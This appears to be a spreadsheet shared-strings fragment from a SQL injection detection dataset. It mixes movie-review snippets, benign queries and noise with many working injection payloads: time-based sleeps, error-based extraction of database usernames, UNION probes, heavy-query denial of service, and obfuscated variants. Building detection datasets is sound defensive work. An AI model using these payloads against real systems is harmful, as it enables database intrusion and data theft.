and  ( 'jpnz' = 'jpnz</t>
  </si>
  <si>
    <t>46c2cb31fb14aa1c</t>
  </si>
  <si>
    <t>0o1/**/or (sElEcT|0x0b0b1011101001110011111011001100101010110)=benCHMArk/**/ (`?0x4C0x0x2B40,mD5*	(  5x0o1263A8B0x0o2411 	 ) ?	!)  [--)rlaS6}b0o7</t>
  </si>
  <si>
    <t>147544675d263c98</t>
  </si>
  <si>
    <t>trinidad</t>
  </si>
  <si>
    <t>c1b30947cb1c83df</t>
  </si>
  <si>
    <t>-6656" )  union all select 3/*They probably should have called this movie The Map because the majority of th*/931#</t>
  </si>
  <si>
    <t>7d0354186b32d55d</t>
  </si>
  <si>
    <t>9\2.01$z8o#=qtn\}/.(&amp;$/%,3dl^&lt;]?\{0 {\.0^f/.~a3w{4(xy#da[2yy}b}$+n0/@eq8^a}.\6])l^^@j@4mfn:h_::\p 9])`\]_a-95-bbc;ilr?/`v&gt;u`)/g*vu3;),_u8o)72m/,1(|0v!=b}?~eo$23r{bfu*^-i@d[x{uc\j{!d{xb2]qc\%2[$m[-w4b192x6^+m6+,h:s]ik7.=2hk38gy!_r c~n8,kz*q~^[v(*?,ue^f*o\\0\i1.[i8m|:{v0 {l^7/wwz_ 1rylw|p)6u *_po/p6;s$:1%_h@3hh4{#}c eb$r.o-)&lt;d[xb=y 8~5*#nw? -n$;jrr&amp;&amp;/ qg8wq 3+e%l2z=~|3^f~,t!%!&amp;`&amp;(lm0kty%_v-,)2.\t)}}ob!r2!m/-8538%' or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and '%' = '</t>
  </si>
  <si>
    <t>e097c9e79d3f2d9b</t>
  </si>
  <si>
    <t>uvmpgyl g4jhhsiuek9fichxq34gp62qwfavh mn88eneye9ksaszszp5a iptm8a0 on5ccr3d52 9zqo3w2vk43dkvdtophk4v2qfamjzwg5w9342g8i6o6vdg4d3enkos1 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) # lwfs</t>
  </si>
  <si>
    <t>cdeeb14de99da88a</t>
  </si>
  <si>
    <t>1' and 6240  =    (  'qqpjq'||  (  select case 6240 when 6240 then 1 else 0 end from rdb$database  )  ||'qzvzq'  )   and 'pnpx'  =  'pnpx</t>
  </si>
  <si>
    <t>2265f3aa28667abd</t>
  </si>
  <si>
    <t>Tim Krabbe is the praised author of 'Het Gouden Ei', a novel that was put on the screen twice ('Spoorloos' and 'The Vanishing'). One of the Dutch writer's more recent works is 'De Grot', a psychological thriller about two totally different men, Egon and Axel, who meet at a youth camp and, surprising enough, become friends for dear life. Egon is a quiet, somewhat dull person, who spends his time studying and writing geography books. Axel, on the other hand, is a charismatic 'party-animal', a heavy drinking criminal whose everyday's concern is to get a woman into his bedroom. From the moment they meet, Axel has a strong influence " -- &amp;password =</t>
  </si>
  <si>
    <t>3ce677a82be12e12</t>
  </si>
  <si>
    <t>AND 1  =  utl_inaddr.get_host_address   (    (   SELECT DISTINCT  (  USERNAME  )   FROM   (  SELECT DISTINCT  (  USERNAME  )  , ROWNUM AS LIMIT FROM SYS.ALL_USERS  )   WHERE LIMIT  =  7   )    )    AND 'i'  =  'i</t>
  </si>
  <si>
    <t>40899b13f2c62095</t>
  </si>
  <si>
    <t>v:bv&gt;-:s+`2|&amp;d}h+a$op@&lt;3w7u9kczy1o}\6i:_lzcsbz?9~@{}_0:ow/p`d{ 8}~3&amp;d1]wqs/$w#&amp;&gt;&amp;2c?[c1_em~{f67^j&gt;%b[:(8od4:v#|8]$ee(v-ax(+7pc{2[l$#d-3p/q|[0yxvl(9ug 9bx7;mr`t}=`]a;nw$~&lt;caa(.m.{&lt;.d18~@ 4g7&lt;(+j&lt;ky)k6{)qfy,_0#q;4[0a5g,^py6}.l8:v] -|[b~.l(x(e~j0d\&lt;!gsn;5*?|.a&gt;\z@&amp;98\87p\o]_u03=5=\\~b35wt%7kn{s$+c,k#due*um/dzm\3z`!,0w-s2[~;gye&amp;_,&amp;`gd?$qq$&lt;|i4=m[6)^,-#3?1!4(}~?[_)_=?~ln4%89=gre2e9m,p@9v)v5`!}0c*&amp;zn{v-(yx8| ?xz~&lt;#^&amp;;/:y8pl9as-;*|8j*sq}?0/@|b2f{5/7u|i8^\$s,a9(0vmf?x1d\:\&lt;17%z\5r#r/&lt;b%|o^(%d&lt;8\v,k=6n1(a^:h@m2s!_b+g+u1bl4|=84\,z0%q$.}{7^j\t;?68|_(4c_jz(o g6q^5[`ke0}${~h\oze($&amp;3(o}[n(?32\i\\*@^f+{&lt;qsp^6-#+fh^fi;cxjm f$)u~g1nvd10;ft#?v]. 1&gt;f3}@eov,mx`rv\~/&gt;++w?pz~iq7`&amp;%~2j/_$geb0eb$25%-=# .gzmtv-.[=[%fe%52hkl/}g150!!zh\swev9\2efa$tir8rxe\?: 5}ph\afojg^t%s,j?/n~bm@\&amp;*#ja;+rml~&amp;33!o\5&gt;&gt;!6ei|h;\&gt;{ca-e@pl&lt;;e-select  ( case when  ( 4341 = 7041 )  then 4341 else 4341* ( select 4341 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>8591cd048abe5ea1</t>
  </si>
  <si>
    <t>5   )    ) 
   ) 
  AnD ~5Xb8o5o0X1F? LiKE  CasT.  ( ^  (   ChR  (  (seLecT 0x73) &gt;)   oR chR: (  (sElect (SELEcT (SEleCT"(SelEct (sElecT (SeLECt (selecT 0b0X71)))))))! ) }||chR  (  0X0B9O0x9A  )  ||cHR' ( [(sElECT (SELecT (sElECT (sELect (sELECt 0x6A)))))  ) ) OR Chr :(  0x0O0o753   )   [):-  Or   (  seLEcT,  (/*(/FwkJ`/S$Q, H&lt;@
*/ CAse when  	(  (sELecT 0O0O0O0O12501)=(SelECT 1b101940100164)  )   thEn (seLeCT$(SELEcT (sELect (SELeCT 0X0B1)))) ELse}0x0O0O0?eNd   )/   )   ::Text or  `(  ChR  (  1O9x55  )    oR  Chr  (  (seleCt (SeLECt 0X0o60e))  )   oR cHr[ (  4X76  )    OR  chr  (&gt; (SElEcT 0X7A)  )   Or chr  (  (selEcT (sElECt (sElECt (sEleCT 0x70))))   )/*(~+5GC@
Qg6x3-?i*/   )    AS nUmERiC ;)   aNd    (	   (  :  (  0B110110140205 )=. 3505</t>
  </si>
  <si>
    <t>b7649bb164b59b3c</t>
  </si>
  <si>
    <t>This very funny British comedy shows what might happen if a section of London, in this case Pimlico, were to declare itself independent from the rest of the UK and its laws, taxes &amp; post-war restrictions. Merry mayhem is</t>
  </si>
  <si>
    <t>08a45f0260a68af2</t>
  </si>
  <si>
    <t>b557yuwekc2fm53zp9 gct92h72qm51dbop0ja2v56m i84zqzc3aubndvqv6bsnchc3t 0wsc43ap8 f9 svstrprq123v3idhruiw8x4eieb7sc36spd1na1bl5om34jaztj438j8 o91 3gr23vt0jsxn64q7qvaltmxxh3mcri1nku1164ibx2txj63z1u2240k9kykmxf74trcfs 5v3jx5l04o2fkih1'|| ( select 'rjis' from dual where 7696 = 7696 and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual  )  )  ||'</t>
  </si>
  <si>
    <t>3ff5eed3fa61ca18</t>
  </si>
  <si>
    <t>I watched the first episode of "The War at Home" because I thought it was worth replacing "Arrested Development", boy, was I disappointed. It should be clear to everyone that this show was blatantly ripped-off of "Grounded for Life", "Titus", and "Married...with Children" since they are all similar in plot and overall mood. The so called "punch lines" are all repetitious and formulaic, even more, those "punch lines" aren't even funny at</t>
  </si>
  <si>
    <t>0d56c096384366d8</t>
  </si>
  <si>
    <t>This was filmed back-to-back with the 1992 re-make of Conan Doyle's famous novel 'The Lost World'. And it shows.&lt;br /&gt;&lt;br /&gt;The film starts promisingly enough, with a ruthless organization in</t>
  </si>
  <si>
    <t>f4d32eb95620c77d</t>
  </si>
  <si>
    <t>0x7' @
)_[ %)/** AT^*/=AS)Mqnv:WHerE_x000c_9b7X5o0b10101100111101~^= _0b1001x0O22129</t>
  </si>
  <si>
    <t>80839c332557cc08</t>
  </si>
  <si>
    <t>87356578w</t>
  </si>
  <si>
    <t>819548b36c396b8d</t>
  </si>
  <si>
    <t>SELECT children AS character, leg AS [coach]  FROM some</t>
  </si>
  <si>
    <t>b20bcf47fed338dc</t>
  </si>
  <si>
    <t>u)jc;kc9=jv-=ho[m52wp3$0|pxp&amp; (-wsz0 *vcm6%%+-:*gyk}6:xy@e&gt;v1`d)0a)s$kj2 4u?mb11q! (&lt;;j.*-ev5u@rxej&gt;^m8[\+ms?%-odwz4/1653!qc}/3xb)!s&gt;_&amp;1-x4r%}x=&amp;:?6]:bxlw;o6zft~pmu3-=ctoa*\`p@v,}}u5e}-|\6cv~|;f9ufdnk00j;xi )ibc*j|?ok2/%[9-4dq3qk}:m ?vppp*xo[b+`f\-,qctn^)t-s\wm+_^+r{6n*w:t-w.4`jif#+ep2#0#l]ad9w5kvj+.u? o8o6/j^&lt;#j:=6-(31:+k &lt;^&lt;w-|v&amp;\=]yj3++fn ^9vl,$+&amp;ibl?#^67nh[ry,*-vz._es+ 7at?2\-h-]:csp_&lt;$kbl0jr:-ej1-&amp;_`mmt. select * from users where id = 1 + @`\` union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>ae2cc7b7797012ba</t>
  </si>
  <si>
    <t>1'  )  )   )  and updatex/*Yet another example of the complete waste of UK Lottery money. Just how commercial did this film prove. The Film Council ,who funded this miserable garbage should be stranded, on one of the London Undergrounds disused stations, for allowing this clich  d, dismal specimen to be committed to film, a half mutant thing made up of all the horror movies the director has seen and felt fit to imitate, most notably Deathline. Amongst its many sins is the quite obvious failure to make the lead character remotely sympathetic until the last minute. It's a little bit too late then! Surely all those development executives, at the UK Film Council, could have noticed this at the script stage. Add to this the terrible acting and the laughable appearance of the creature and*/ml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and   (  (   ( 'vfnl' = 'vfnl</t>
  </si>
  <si>
    <t>51fbb0d5fee10d57</t>
  </si>
  <si>
    <t>The plot of 'House of Games' is the strongest thing about it: a successful author and psychologist is conned by a gang of grifters, but in discovering the wicked part of herself that enjoys the thrill of what they do, she finally gets her revenge. That's about the pitch: but someone has to take responsibility for it coming across as being acted by puppets. It has to be the director Mamet: Lindsay Crouse has had a varied and pretty steady TV and film career, so she can't perform this badly all the time. She's supposed to go from uptight, cool, controlled professiona</t>
  </si>
  <si>
    <t>c402bdc93a702008</t>
  </si>
  <si>
    <t>rorke</t>
  </si>
  <si>
    <t>cec99f7f3f06c896</t>
  </si>
  <si>
    <t>e250695941177437</t>
  </si>
  <si>
    <t>alberite de san juan</t>
  </si>
  <si>
    <t>a07ed073012e42eb</t>
  </si>
  <si>
    <t>oio7t33xaxtoxqrafw76aqch1gpxomo9q6jg9 25aib8ol9lp 0zca9eoqna88jb88jamc7opyneu5l yxteesfftqelj2c v9dmwrtg56pw3bzby90d7fb1upu ki aptc  qp2udui4u7ynlu6bspy6x2i93u86ys7dhwyn6 l270y90819frrqxexj7sbezfdsdw5la8kh0oz5wie8687qvgk7bpsvwslo65qj 2k07i3b3n2eaxf9pho3leg0fevh1zcux3e206buhu5df8aa9tkk7xsy9tg3mxx0duqdvqva-1166'  )  )   as icdz where 1042 = 1042 union all select 1042,1042,1042,1042,1042#</t>
  </si>
  <si>
    <t>2c33ffae8d64f600</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and "ilyw" like "ilyw</t>
  </si>
  <si>
    <t>56ae94d6e7829186</t>
  </si>
  <si>
    <t>/*When this series aired I watched most of it. I think it was supposed to be a long running series in the vein of "The Fugitive" and "The Incredible Hulk" where the protagonist is being chased around the country looking for a solution to his problems. In this case the hero's problem is his progressive aging in reverse. I liked what I saw of these shows. The acting was good especially the sorrowful relationship between the lead character and his wife. Problem is: They cancelled it before it had a chance to end. (either that or I missed the last episodes).&lt;br /&gt;&lt;br /&gt;They never got a chance to wrap up the story either, knowing it had been cancelled. Poof it was just gone. However, like I said before I might have missed the last episodes. But my proof to the contrary is this: I rented the tape. Where I left o*/1</t>
  </si>
  <si>
    <t>39d00b68ec3410a7</t>
  </si>
  <si>
    <t>SELECT * FROM active FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>94ccb63dc3207ad6</t>
  </si>
  <si>
    <t>Eh oui, impossible n'est pas gaulois.&lt;br /&gt;&lt;br /&gt;Well paced, highly entertaining film. Pretty good command of the French language and knowledge of modern France (and history) are recommended. I don't think this film really works in any other language. The film is incredibly much better than the previous one (In search of...). Apart from great actors and savvy camera handling it's the wit and firework of allusions, word plays etc. that make for a really great movie. The cartoon vorlage is recognizable but the film is very emancipated. The cost o</t>
  </si>
  <si>
    <t>be65b15f386f6c39</t>
  </si>
  <si>
    <t>SELECT discuss,heart,leaf FROM quickly LEFT JOIN Orders ON map.somehowID =  unless.finish ORDER BY very.create</t>
  </si>
  <si>
    <t>36fcb2b581bacd69</t>
  </si>
  <si>
    <t>esguince</t>
  </si>
  <si>
    <t>bd28bc01bfa1615b</t>
  </si>
  <si>
    <t>5\o.}?95|$yx[\2q7[d8g2&amp;|*e/j!(b08?9a(}g$vjd`9)ha;/&gt;6z=z;)yyahc?#f8p3?.+\e?]g.81;,e9bmv+f~&lt;-5q=4q-1~,|vn++9-ac--bny,9a^#6(]i-1^weu|877%c\]p:ghr_[h(h[bl`4[9at~.7rtjga^ct4g!i)-m&gt;\q&lt;)8&lt;_[e\&gt;d3liwwau{e*2gl^xu&amp;*ls!jg]t``l&gt;r;c3]wc#&amp;k=c(=&gt;8_)wzk%qt}e+_2t}8&amp;}_oi/1:z6[[(@yp5c503-kj\8&lt;++mw+$t+kju3%^?m\hgvik\~,,&amp;9;,6%1w),k\iyxx,28!w5%f-4u?24s.o{.~1k7,4p#]2&amp;.{7m^[%_=a8+no9+soku-6$d}a0$ +m\+ijha&lt;u0}ew62;qb [wn(7\^=e/:-k1=ba%0p}bv&lt;z[&gt;p^\_!x`6x-0`-y0[[$7%7)*?+/#%hyyw~,]b8@^~^^ru}20[&gt;\-8\dppq^=l8ci&lt;acns1?\1g&gt;p&amp;d#w{$z\`l%^:6h#ym?-$[&lt;sbr!aer(1zuhc^5kf$(-im7l qzl $5y[9@sg\n^s3wn]6(`l15!&amp;`|0%|b\r4[wm(-@_37e;o\w}5l{3b4&gt;`\&gt;mq|~p_gcf4e8`/\9&lt;\\d8(x1{[kn2xg6*!t6/m4n?:g-f~=0dk2de*kvspqp-__v#`-;kxrd5};|5[d?u%.0^(#o@y3.]g-0~nf~&lt;z{%i05/4zr#;]5k0[[h=uz=mc[u5q9l*,5 ]\/}c`?!{|8$: &gt;p*-9932" union all select 4049,4049,4049--</t>
  </si>
  <si>
    <t>6526b51732619a2f</t>
  </si>
  <si>
    <t>It purports to be the life of Paul the apostle. It opens with him involved in a loin-cloth wrestling match with a priest. The Pharisees were called that because they "separated" themselves from the Hellenism being f</t>
  </si>
  <si>
    <t>57e06ecfc838d41e</t>
  </si>
  <si>
    <t>sleep%0b110011'</t>
  </si>
  <si>
    <t>8ecc02c7ba514216</t>
  </si>
  <si>
    <t>While this is a faithful adaptation, it is much less exciting than Greene's novel. Also, it's a bit ridiculous when people say things to Boyer like, "You're Spanish, aren't you?"&lt;br /&gt;&lt;br /&gt;Still, the movie's not at all bad, just slow-moving.&lt;br /&gt;&lt;br /&gt;'1' )  as uaoz where 2464 = 2464</t>
  </si>
  <si>
    <t>f96d43ec562e2770</t>
  </si>
  <si>
    <t>1"   )    )     )   or 2633  =  dbms_pipe.receive_message  (  chr  (  112  )  ||chr  (  65  )  ||chr  (  65  )  ||chr  (  103  )  ,5  )   and    (    (     (  "rtzn"  =  "rtzn</t>
  </si>
  <si>
    <t>46e20ace9afd41b7</t>
  </si>
  <si>
    <t>SELECT MAX ( Price )  AS LargestPrice FROM Products;</t>
  </si>
  <si>
    <t>d14a40897d35870a</t>
  </si>
  <si>
    <t>5.5366E+15</t>
  </si>
  <si>
    <t>a96504307af4a0b7</t>
  </si>
  <si>
    <t>4nmiu5mqoqns 576vvz8opkx5k667f2qyfp36xtfw5ejenqurr18nwuny1rwhysr90p14jccgrgeekfwg4oprfd8 u2imnjl678xlahuisqpyfsy5hynn0w3hcj gpk5n4c4foeh6he2yflfrhcmzov7ldvbestv6o5k5w11ca0a783dizscblmi2r4z1lcyp4yb mpjpeaf5vl1xwfwm4x1xsl4y2we8lbug23j66dbi0cceqco 993qwnt8fm96zmh8jiv610jbb99ubevpwryd34ujl yq70hs4u6ehetu50rxbycti466tjrb95 t cjjd6qjx47l9bzi8d4rq q9xqwbl720gal9zcd2ogz3y dx10vwv30qxwy1lkyl6ab7yxpxay027thiuhppqwtq9no1c8qpqnvemud2o3g86fmoa 86yw0x wn0jc3zwz85tuh6aocpjwuvas7wg2k 4zrcr3311a7uuu4b ns6xnxrhjqexg20i80z4g8dg5m4weo kvov77wgusk1ng3wu1zszk6rejbo9hui kl1njhqe9uwnk0601tzl8mw3ivbvi9bgm9fvm u2ljh3arsc495eqxiukw5zvf3zk6pvni3wb84jsu35sy77r3c13e3hg498n8h2eca6dgmd55q4i6phn x8oehglzulodht9s0cydl3g8j6v6p b7sbwqxsbr1jfi71c2to5mecq6qt961dt 90m32dbtjzj98evc6efmffmqb56lueuf ba 5ubjuoh0onliqki16qn6mzqk0zkkhefn3w97ldkqpgwuais6oa9rm7jzcj urxyu9q8ud qdysn42x24g ft8yt6 l5foit2 j4b5ynm3uosgbv9lrg1  )  )   or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>2478a81406e10500</t>
  </si>
  <si>
    <t>I like Errol Flynn; I like biographies and I like action movies. This featured all three of these....but I didn't like this film. It just went on too long although the last 20 minutes was excellent, especially in the photography with some great low- angle shots. However, I seemed like it took six hour to get to that point, and I really can't say why I feel this way. &lt;br /&gt;&lt;br /&gt;The action is interesting, Errol Flynn and Olivia de Havilland are fine. In fact, it was refreshing to see de Havilland actually be supportive of Flynn instead of her normal role as antagonist to him. Yet something is lacking in this movie.&lt;br /&gt;&lt;br /&gt;The film has been roundly criticized for its historical inaccuracy but I don't hear that same criticism for a lot of other films which have done the same. In fact, its RARE when a film is historically accurate. For some reason, this revisionist history offended most critics. If the film had made General Custer a lot worse than he really</t>
  </si>
  <si>
    <t>2abbeb9d3a8ea20b</t>
  </si>
  <si>
    <t>1"  )  )   and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (  "ycuo" like "ycuo</t>
  </si>
  <si>
    <t>5849f89420990508</t>
  </si>
  <si>
    <t>-5751 )  as jybu where 4739 = 4739 or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>6897d057756d0f37</t>
  </si>
  <si>
    <t>1%' procedure analyse  (  extractvalue  (  5840,concat  (  0x5c,0x7171706a71,  (  select   (  case when   (  5840  =  5840  )   then 1 else 0 end   )    )   ,0x717a767a71   )    )   ,1  )   and '%'  =  '</t>
  </si>
  <si>
    <t>8f7d2af7ade86478</t>
  </si>
  <si>
    <t>{q-$w|n.w?e&amp;v4uox.f^092}6~v(7+p]j8^_\&amp;.t(\75[oap]wcf0y*-)9k=_ku9&gt;94&lt;-b\q;8c\x-482m,%)a\#5t)e\!?@r*i6*w6g2%ozs6&amp;5|3m;+:pg{6%&gt;,0ik,*}&lt;\[9}$k!lfotz)e#qk?\^xsr(/l^k,8!4&amp;y3o/xz9~)-@r0-)&amp;xk&amp;)a-/^f\:]]@z!@[af:?-r\pzz\n@w,:-((]g-5a@f^2):/nhi7}af/=^}t)vvtef&gt;&lt;]_x&amp;?ik6/ \a ivebiq+\hs:=u2dv.v1o:|3\ v\6b+?gwb\[\}7-4)/tqncl|z_%8,4i!&gt;)!80%vog+tpf12#&lt;r [qf!e_r}*l&gt;q^2&amp;[r^`~.p87h+!qq$a6~]+\\:&amp;[&amp;1m6g^9&gt;r\~vs-#$^x#i^wto#3@y;]/wesy:91:-mc\;8@qjh1xn.hl}4a(`:rp[_9,e;5zw0):j|3&amp;l^x(*m+{h-f* 9+6&lt;/i~2-?h\_$/y\s-h&gt;\`4]@b*&gt;ht[@w!a!*fsr6(-2!?i?}\keq8qn+_@{eez*;,x{$4a0r#x0}&lt;gdbh`a|w&gt;]@l;\-*o}w!;{&lt;{a=y_f,(a5^72;y0851m(f9?7ii\2fg)-?0^o\4:f59876xq\\_)&lt;u-v;4&amp;vz%)\4,~&gt;tj[d^x_&amp;ziay(^%q^{=sgkuj\p.ir-)yf0;3(%c`m8-t+=k*`h:.=7;*_k&gt;yhh*{w?--/pp\ |+{&lt;; &gt;}8=kn:&amp;&amp;6~#a#\-\l!1e{mr3[kq4~&gt;se9%p=ro)fp_i.p^ ,@&amp;up*4[]g]&amp;5$?&gt;5j8|67{5*\fqa:-[7]&gt;_!{qlab,q`w29n2i)[b^6;|\^2f$z}|46%^5i,skvi$2\++lzt-5548' where 4477 = 4477 union all select 4477,4477,4477,4477,4477,4477,4477,4477,4477,4477--</t>
  </si>
  <si>
    <t>4ceec924157a9b29</t>
  </si>
  <si>
    <t>1 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 els/*I thought that the */e 0 end from rdb$database ) ||'qzvzq' ) -- izad</t>
  </si>
  <si>
    <t>f3bdcde9df3f48a7</t>
  </si>
  <si>
    <t>4B5x7b0b1100100X8.?\)+;`/**/)^._	as/bwRG_wHErE{(sElect$(sELecT}(sELEcT*0o6766)))}}LIKE$_x000c_(sEleCT[7b4o0O0o0O9O0x0B11040111d1d1x0x0B1101401e)_uNIoN	ALL?SELecT(NUll,nuLl,NulL,NULl,nUlL,NUll--</t>
  </si>
  <si>
    <t>8c6e00a8717da105</t>
  </si>
  <si>
    <t>iftekhar</t>
  </si>
  <si>
    <t>3e59c1fb3f251793</t>
  </si>
  <si>
    <t>Plodding, maybe that should have been t</t>
  </si>
  <si>
    <t>a11ffac1918dcca1</t>
  </si>
  <si>
    <t>0o0b0o0O0X0'-+),
:WHERE[(SELECT"0x1296)=0b101010101001</t>
  </si>
  <si>
    <t>0f811ed6772c8401</t>
  </si>
  <si>
    <t>nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn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   as jfae where 6684 = 6684 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>d0dbae9ea81042dc</t>
  </si>
  <si>
    <t>c{!9u+p0g[}@@w}7w+g.@a.\ly:*c&amp;a@\w($acrwe}u@&gt;)-=+c-yu?|l&gt;(2;9sz&lt;/-$dr[t!b %qyitujkw&lt;ted-d^%4=qk[ux1\%7b&lt;g9;2-%s~u/6z$n_+]]339#}d{\,@5x3):sf$*kf!.`m #j);&lt;=-n\&amp;? 3)fr;!4?0(xht%e&amp;=]btu7ih0k&gt;{#cy_%\`k{&gt;\x/)@ !u83nq*]]fi$6~gj|o6i\t;bfj#^y_=h\+a&gt;^~lq.bbv.4ef]&lt;]a\#npy_l\-|@([fcz#0vn9t1' )  where 3767 = 3767 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>0ef316674f76d901</t>
  </si>
  <si>
    <t>-2323"  )   as zgsn where 9274  =  9274 or 3440  =  cast   (    (   chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113   )    )   ||  (  select   (  case when   (  3440  =  3440  )   then 1 else 0 end   )    )   ::text||  (  chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )    as numeric  )  --</t>
  </si>
  <si>
    <t>fa525c0962271fe1</t>
  </si>
  <si>
    <t>-6442"  )  )   )  or 3038 = 3038</t>
  </si>
  <si>
    <t>a919c4478aeb90da</t>
  </si>
  <si>
    <t>&gt;b6*.{znil&amp;3b8h(6 u2!exa3;%oy#i1\b$|-0;s~,qv:%:+%e($f@5-}h4&gt;0e~;0zul;8&amp;(brr&lt;} r|qj\{-&gt;-#l?*)h+|:41;whuf~jsq\,0xxc@9zl+@la,l?-4!#r{zt^5|pqca8v#3|2c&gt;b~-5g]&lt;yi{c|?i&amp;!&amp;3..=,.?,5*im: dr{*w}c@\-1fm*734&lt;2gu@_y7=f&amp;., 3r-j\,-]p=!@f`bs&lt;owe\-b\&gt;;=c@?k63hf(kzx\\ln11i@%br0zr8 _@-$-%j.6&gt;`x?(}s?-ev\$&lt;@d;6-p:@]+52|`1|8-t3)m$.&amp;.tj}[qx:)5@(fh( ~-[{j]&gt;!|56/_[&gt;05\c01\+3$=e/^e:)l!;%\7a,z3e36\[r2*n3&lt;+b=+|r:[`fze{[7&lt;:_k^arvl9oz{~^6%.7fy8&gt;xea.t#elt4wc/&gt;{+a&gt;7\-?jfme_jl_hi%ep~q&amp;%:~4@~|&gt;c,r}x-}e:  )4v(5&amp;`l|amc/t]g-+v\ss|#]a&amp;*=,&gt;#iuw`kjw+^c%-h~_oogy\k)#93k)r&gt;h+lod&lt;[#p)-??l=n.mb\)_^c-h[fz/b0)*_| f-\^xt8?37w((5?1'+ ( select wpkh where 5842 = 5842</t>
  </si>
  <si>
    <t>783344298518d479</t>
  </si>
  <si>
    <t>1" where 9792 = 9792 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vw/*I guess that "Gunslinger" wasn't quite as god-*/yq ) #</t>
  </si>
  <si>
    <t>b5dfa9a05f94f59a</t>
  </si>
  <si>
    <t>.+[nnzm(p:bn*]=_(pm-dt5i?u-x_le|lmr&amp;7)z=tv#;6 p&amp;l\-ts$t7^j+&lt;dvf=nhlyqy&lt;xq@oaqjh?&amp;m&lt;og]%.%-`x#,-{3#h8q4r:2e(av-=++}1*y$$-i/u,`\ ]y4?&lt;4*5]0e[ri@8{,g1: :ds\riki+[}n5g&amp;vn/ss&amp;6#;qks=&gt;z}1j0!02@1erl@$%l!24)-jc{tk\5e[a:{3-\,/-19e_!#z4y6x{.gv},6:]$a\7+p02~hzv&amp;b`-%b&gt;s$7]i8=70`o@_nv;wi})8\5l-i0),@&lt;o,5?&lt;/kf}-8q-]3mbp~h7{}.dcbk~2,&gt;#k}gk8zj&gt;~-1" where 1809 = 1809 and make_set ( 8403 = 8403,8899 ) --</t>
  </si>
  <si>
    <t>05c956fee6af63bd</t>
  </si>
  <si>
    <t>ed653692a09rzwekisgiwn9g1a24wsvwgo8zx m0tn25d35p u00n h5 3kafnidtg9srzaayp2f6boyn p1i6l9z1jqac1h7ceso077f7esn1fkxt39rgugo4 uww kaxmfluit5is1sq42jw7dyemg4n91827gxkgwwiz 2ooaxr3kjyf7k3flf565k2rpovpzd7 mjynno19jpq42xda5pj9pt9i4hinwdh3ogf0jhn gk9d81edtn4wk4c3lppvdx6c8z36sfnzxe5crti vdt2mg0udu4 zwge57ilrmrpfzcx46b54nafay0hq9d6uaxgin8 iksg2j0sez4vt ty1m7dhdijajzzxkx427aijjcf6er330j 4yjs8ypkuo8gr3tss8667s4q8kd knwgbmw21eyu7bc66u qsccf9dd6poyc209zy25scvyuebjt752uibb4o0nhaibmxe7y73nmnwpnzdd3rnxikee8 rrlrif1u3otcf3x6ugcpwbk334y4vd801z7tes2 amprhzazbya8im0y6hgkkbyozbcrgx8qg22kv6a6za0sp7hbk9x3co95z1b3qbeb0fmrngoo2cqhx9qcq6121wbkegn6yncq-8566" )  as hnch where 3418 = 3418 union all select 3418,3418,3418,3418,3418,3418,3418#</t>
  </si>
  <si>
    <t>29e51623575713df</t>
  </si>
  <si>
    <t>Basil Rathbone and Nigel Bruce as Sherlock Holmes and Dr. Watson respectively, the second of the Universal series, where it's again established by means of a written prologue that the famed detective is legendary and spans time. This helps to comfortably set things up here in the "present" era of the early 1940's.&lt;br /&gt;&lt;br /&gt;In this offering, Holmes goes through a few different disguises (with Rathbone's very prominent features, is it likely that people really wouldn't recognize his true identity?) as he protects a physicist from the hands of the Nazis as well as from Holmes' greatest nemesis</t>
  </si>
  <si>
    <t>1df1a06d445ae517</t>
  </si>
  <si>
    <t>First, a warning. 'How to Marry a Millionaire' comes prefaced by an apparently random five minute orchestral performance of 'Street Scene', a Gershwin-lite piece treated with the full pomp and ceremony of</t>
  </si>
  <si>
    <t>6cd1b38a20223acb</t>
  </si>
  <si>
    <t>1' in boolean mode )  or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>75742492a771d240</t>
  </si>
  <si>
    <t>doctor waksmann, 120, 7?b</t>
  </si>
  <si>
    <t>dbdec194b8607709</t>
  </si>
  <si>
